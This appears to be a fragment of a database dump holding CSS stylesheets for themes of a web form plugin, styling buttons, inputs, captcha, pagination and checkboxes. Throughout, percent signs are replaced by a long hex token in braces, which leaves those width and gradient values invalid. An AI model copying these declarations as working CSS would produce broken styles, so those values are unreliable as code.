#000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(5,'Theme 02 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #ADC0DB;\r\nmargin-bottom: 10px;\r\ncolor: #ADC0DB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #285485!important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/01/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #708EB4;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/next.png) top right #144077;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #285485;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #708EB4;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n .previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/01/previous.png) top left #144077;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #285485;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #ADC0DB;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #C5C5C5;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #708EB4;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size:18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor:#0E3F76;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/01/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n} \r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n	color: #2564A3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #0E3F77;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #0e3f77; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0e3f77 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0e3f77), color-stop(49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d), color-stop(84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5), color-stop(99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0e3f77 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0e3f77 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0e3f77 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #0e3f77 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #0f437d 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #2f72b5 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #165ba9 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #CCCCCC;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton 